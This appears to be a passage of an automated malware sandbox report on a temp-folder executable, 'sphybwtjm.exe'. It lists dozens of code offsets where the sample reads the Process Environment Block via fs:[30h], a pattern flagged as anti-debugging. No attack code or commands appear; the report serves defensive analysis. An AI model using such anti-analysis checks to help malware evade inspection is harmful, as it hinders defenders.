Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01567D50 mov eax, dword ptr fs:[00000030h]	2_2_01567D50
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156B944 mov eax, dword ptr fs:[00000030h]	2_2_0156B944
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156B944 mov eax, dword ptr fs:[00000030h]	2_2_0156B944
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01583D43 mov eax, dword ptr fs:[00000030h]	2_2_01583D43
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C3540 mov eax, dword ptr fs:[00000030h]	2_2_015C3540
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156C577 mov eax, dword ptr fs:[00000030h]	2_2_0156C577
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156C577 mov eax, dword ptr fs:[00000030h]	2_2_0156C577
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154B171 mov eax, dword ptr fs:[00000030h]	2_2_0154B171
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154B171 mov eax, dword ptr fs:[00000030h]	2_2_0154B171
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154C962 mov eax, dword ptr fs:[00000030h]	2_2_0154C962
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549100 mov eax, dword ptr fs:[00000030h]	2_2_01549100
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549100 mov eax, dword ptr fs:[00000030h]	2_2_01549100
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549100 mov eax, dword ptr fs:[00000030h]	2_2_01549100
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618D34 mov eax, dword ptr fs:[00000030h]	2_2_01618D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01553D34 mov eax, dword ptr fs:[00000030h]	2_2_01553D34
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154AD30 mov eax, dword ptr fs:[00000030h]	2_2_0154AD30
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015CA537 mov eax, dword ptr fs:[00000030h]	2_2_015CA537
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574D3B mov eax, dword ptr fs:[00000030h]	2_2_01574D3B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574D3B mov eax, dword ptr fs:[00000030h]	2_2_01574D3B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574D3B mov eax, dword ptr fs:[00000030h]	2_2_01574D3B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157513A mov eax, dword ptr fs:[00000030h]	2_2_0157513A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157513A mov eax, dword ptr fs:[00000030h]	2_2_0157513A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120 mov eax, dword ptr fs:[00000030h]	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120 mov eax, dword ptr fs:[00000030h]	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120 mov eax, dword ptr fs:[00000030h]	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120 mov eax, dword ptr fs:[00000030h]	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120 mov ecx, dword ptr fs:[00000030h]	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov ecx, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_015C6DC9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_015F8DF1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0154B1E1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0154B1E1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0154B1E1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015D41E8 mov eax, dword ptr fs:[00000030h]	2_2_015D41E8
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0155D5E0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0155D5E0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572990 mov eax, dword ptr fs:[00000030h]	2_2_01572990
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157FD9B mov eax, dword ptr fs:[00000030h]	2_2_0157FD9B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157FD9B mov eax, dword ptr fs:[00000030h]	2_2_0157FD9B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_016105AC mov eax, dword ptr fs:[00000030h]	2_2_016105AC
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_016105AC mov eax, dword ptr fs:[00000030h]	2_2_016105AC
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A185 mov eax, dword ptr fs:[00000030h]	2_2_0157A185
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156C182 mov eax, dword ptr fs:[00000030h]	2_2_0156C182
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572581 mov eax, dword ptr fs:[00000030h]	2_2_01572581
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572581 mov eax, dword ptr fs:[00000030h]	2_2_01572581
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572581 mov eax, dword ptr fs:[00000030h]	2_2_01572581
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572581 mov eax, dword ptr fs:[00000030h]	2_2_01572581
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01542D8A mov eax, dword ptr fs:[00000030h]	2_2_01542D8A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01542D8A mov eax, dword ptr fs:[00000030h]	2_2_01542D8A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01542D8A mov eax, dword ptr fs:[00000030h]	2_2_01542D8A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01542D8A mov eax, dword ptr fs:[00000030h]	2_2_01542D8A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01542D8A mov eax, dword ptr fs:[00000030h]	2_2_01542D8A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01571DB5 mov eax, dword ptr fs:[00000030h]	2_2_01571DB5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01571DB5 mov eax, dword ptr fs:[00000030h]	2_2_01571DB5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01571DB5 mov eax, dword ptr fs:[00000030h]	2_2_01571DB5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C51BE mov eax, dword ptr fs:[00000030h]	2_2_015C51BE
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C51BE mov eax, dword ptr fs:[00000030h]	2_2_015C51BE
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C51BE mov eax, dword ptr fs:[00000030h]	2_2_015C51BE
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C51BE mov eax, dword ptr fs:[00000030h]	2_2_015C51BE
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015735A1 mov eax, dword ptr fs:[00000030h]	2_2_015735A1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015761A0 mov eax, dword ptr fs:[00000030h]	2_2_015761A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015761A0 mov eax, dword ptr fs:[00000030h]	2_2_015761A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C69A6 mov eax, dword ptr fs:[00000030h]	2_2_015C69A6
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01560050 mov eax, dword ptr fs:[00000030h]	2_2_01560050
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01560050 mov eax, dword ptr fs:[00000030h]	2_2_01560050
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DC450 mov eax, dword ptr fs:[00000030h]	2_2_015DC450
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DC450 mov eax, dword ptr fs:[00000030h]	2_2_015DC450
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01602073 mov eax, dword ptr fs:[00000030h]	2_2_01602073
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01611074 mov eax, dword ptr fs:[00000030h]	2_2_01611074
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A44B mov eax, dword ptr fs:[00000030h]	2_2_0157A44B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156746D mov eax, dword ptr fs:[00000030h]	2_2_0156746D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7016 mov eax, dword ptr fs:[00000030h]	2_2_015C7016
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7016 mov eax, dword ptr fs:[00000030h]	2_2_015C7016
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7016 mov eax, dword ptr fs:[00000030h]	2_2_015C7016
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6C0A mov eax, dword ptr fs:[00000030h]	2_2_015C6C0A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6C0A mov eax, dword ptr fs:[00000030h]	2_2_015C6C0A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6C0A mov eax, dword ptr fs:[00000030h]	2_2_015C6C0A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6C0A mov eax, dword ptr fs:[00000030h]	2_2_015C6C0A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601C06 mov eax, dword ptr fs:[00000030h]	2_2_01601C06
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0161740D mov eax, dword ptr fs:[00000030h]	2_2_0161740D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0161740D mov eax, dword ptr fs:[00000030h]	2_2_0161740D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0161740D mov eax, dword ptr fs:[00000030h]	2_2_0161740D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01614015 mov eax, dword ptr fs:[00000030h]	2_2_01614015
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01614015 mov eax, dword ptr fs:[00000030h]	2_2_01614015
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157002D mov eax, dword ptr fs:[00000030h]	2_2_0157002D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157002D mov eax, dword ptr fs:[00000030h]	2_2_0157002D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157002D mov eax, dword ptr fs:[00000030h]	2_2_0157002D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157002D mov eax, dword ptr fs:[00000030h]	2_2_0157002D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157002D mov eax, dword ptr fs:[00000030h]	2_2_0157002D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157BC2C mov eax, dword ptr fs:[00000030h]	2_2_0157BC2C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155B02A mov eax, dword ptr fs:[00000030h]	2_2_0155B02A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155B02A mov eax, dword ptr fs:[00000030h]	2_2_0155B02A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155B02A mov eax, dword ptr fs:[00000030h]	2_2_0155B02A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155B02A mov eax, dword ptr fs:[00000030h]	2_2_0155B02A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_015DB8D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_016014FB mov eax, dword ptr fs:[00000030h]	2_2_016014FB
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_015C6CF0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_015C6CF0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_015C6CF0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618CD6 mov eax, dword ptr fs:[00000030h]	2_2_01618CD6
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015458EC mov eax, dword ptr fs:[00000030h]	2_2_015458EC
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155849B mov eax, dword ptr fs:[00000030h]	2_2_0155849B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549080 mov eax, dword ptr fs:[00000030h]	2_2_01549080
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C3884 mov eax, dword ptr fs:[00000030h]	2_2_015C3884
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C3884 mov eax, dword ptr fs:[00000030h]	2_2_015C3884
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0157F0BF
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157F0BF mov eax, dword ptr fs:[00000030h]	2_2_0157F0BF
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157F0BF mov eax, dword ptr fs:[00000030h]	2_2_0157F0BF
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015890AF mov eax, dword ptr fs:[00000030h]	2_2_015890AF
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0 mov eax, dword ptr fs:[00000030h]	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618F6A mov eax, dword ptr fs:[00000030h]	2_2_01618F6A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154F358 mov eax, dword ptr fs:[00000030h]	2_2_0154F358
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154DB40 mov eax, dword ptr fs:[00000030h]	2_2_0154DB40
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155EF40 mov eax, dword ptr fs:[00000030h]	2_2_0155EF40
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01573B7A mov eax, dword ptr fs:[00000030h]	2_2_01573B7A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01573B7A mov eax, dword ptr fs:[00000030h]	2_2_01573B7A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0154DB60
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155FF60 mov eax, dword ptr fs:[00000030h]	2_2_0155FF60
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618B58 mov eax, dword ptr fs:[00000030h]	2_2_01618B58
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156F716 mov eax, dword ptr fs:[00000030h]	2_2_0156F716
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DFF10 mov eax, dword ptr fs:[00000030h]	2_2_015DFF10
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DFF10 mov eax, dword ptr fs:[00000030h]	2_2_015DFF10
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A70E mov eax, dword ptr fs:[00000030h]	2_2_0157A70E
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A70E mov eax, dword ptr fs:[00000030h]	2_2_0157A70E
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157E730 mov eax, dword ptr fs:[00000030h]	2_2_0157E730
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0161070D mov eax, dword ptr fs:[00000030h]	2_2_0161070D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0161070D mov eax, dword ptr fs:[00000030h]	2_2_0161070D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01544F2E mov eax, dword ptr fs:[00000030h]	2_2_01544F2E
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01544F2E mov eax, dword ptr fs:[00000030h]	2_2_01544F2E
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0160131B mov eax, dword ptr fs:[00000030h]	2_2_0160131B
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C53CA mov eax, dword ptr fs:[00000030h]	2_2_015C53CA
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C53CA mov eax, dword ptr fs:[00000030h]	2_2_015C53CA
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015837F5 mov eax, dword ptr fs:[00000030h]	2_2_015837F5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015703E2 mov eax, dword ptr fs:[00000030h]	2_2_015703E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156DBE9 mov eax, dword ptr fs:[00000030h]	2_2_0156DBE9
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572397 mov eax, dword ptr fs:[00000030h]	2_2_01572397
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01558794 mov eax, dword ptr fs:[00000030h]	2_2_01558794
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01615BA5 mov eax, dword ptr fs:[00000030h]	2_2_01615BA5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157B390 mov eax, dword ptr fs:[00000030h]	2_2_0157B390
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7794 mov eax, dword ptr fs:[00000030h]	2_2_015C7794
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7794 mov eax, dword ptr fs:[00000030h]	2_2_015C7794
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C7794 mov eax, dword ptr fs:[00000030h]	2_2_015C7794
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01551B8F mov eax, dword ptr fs:[00000030h]	2_2_01551B8F
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01551B8F mov eax, dword ptr fs:[00000030h]	2_2_01551B8F
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015FD380 mov ecx, dword ptr fs:[00000030h]	2_2_015FD380
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0160138A mov eax, dword ptr fs:[00000030h]	2_2_0160138A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574BAD mov eax, dword ptr fs:[00000030h]	2_2_01574BAD
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574BAD mov eax, dword ptr fs:[00000030h]	2_2_01574BAD
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01574BAD mov eax, dword ptr fs:[00000030h]	2_2_01574BAD
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618A62 mov eax, dword ptr fs:[00000030h]	2_2_01618A62
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015D4257 mov eax, dword ptr fs:[00000030h]	2_2_015D4257
